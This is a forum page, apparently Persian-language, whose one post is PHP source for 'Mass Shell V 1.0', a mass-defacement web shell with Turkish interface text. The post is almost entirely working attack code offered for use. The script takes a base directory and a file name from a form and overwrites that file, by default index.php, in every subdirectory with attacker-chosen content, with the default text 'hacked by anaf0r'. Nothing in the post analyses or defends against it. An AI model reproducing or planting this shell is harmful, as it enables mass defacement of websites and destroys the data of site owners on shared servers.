SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Mass Shell V 1.0 Code By Anaf0r

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Mass Shell V 1.0 Code By Anaf0r

    [PHP]


    <?php echo "<title>Mass Defacer - Anaf0r Mass Shell V 1.0</title>"; echo '<center><img title="Anaf0r Mass Shell V 1.0" src="http://imgim.com/141incik182911.png" /></center></br>'; echo "<center><form method='POST'>"; echo "Klasör Dizini : <input type='text' name='base_dir' size='45' value='".getcwd ()."'><br><br>"; echo "Dosya Adı : <input type='text' name='file_name' value='index.php'><br><br>"; echo "İndex Kodunuz : <br><textarea style='width: 785px; height: 330px;' name='index'>//hacked by anaf0r buraya index kodunuzu ekleyin</textarea><br>"; echo "</br><input type='submit' value='Mass Etemeye Başla'></form></center>"; if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['file_name']; if (file_put_contents ($index, $_POST['index'])) echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>Tamam</span><br>"; } endforeach; } echo '<center></br><b><font size="5">Code By Anaf0r</font></b></br></center>'; ?>


    [/PHP]
صبر کنید ..
X